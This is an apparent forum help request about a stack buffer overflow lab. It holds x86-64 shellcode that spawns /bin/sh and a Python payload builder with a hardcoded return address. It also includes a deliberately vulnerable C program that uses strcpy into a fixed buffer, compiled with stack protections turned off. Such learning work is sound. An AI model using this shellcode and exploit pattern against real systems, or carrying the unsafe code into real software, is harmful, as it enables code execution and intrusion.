maxgonz
Reputation: 15
Having trouble with a buffer overflow
Shellcode: https://www.exploit-db.com/raw/42179
Exploit code (python):
sh = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
retaddr = "\x7f\xff\xff\xff\x00\x50\xe6"
print(sh + ("A" * (120 - len(sh) - 4)) + retaddr)
Vulnerable code (C):
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
char buffer[100];
if (argc != 2) {
fprintf(stderr, "Usage: %s <str>\n", argv[0]);
exit(EXIT_FAILURE);
}
printf("buffer is here: %p\n", &buffer);
strcpy(buffer, argv[1]);
printf("copied %s into buffer\n", argv[1]);
return 0;
}
The virtual machine I am using is: ubuntu-9.04-server-amd64 (2.6.28-11).
How I compiled the vulnerable code:
gcc vuln.c -U_FORTIFY_SOURCE -fno-pie -fno-stack-protector -fno-omit-frame-pointer -ggdb -z execstack -o vuln
The problem I seem to be having is that I can't figure out how to get the rip register to go to the correct return address.
Output:
...
buffer is here: 0x7fffffffe650
...
Program received signal SIGSEGV, Segmentation fault.
0x0007ffff700e650 in ?? ()
Could anyone help?
Upvotes: 0
Views: 174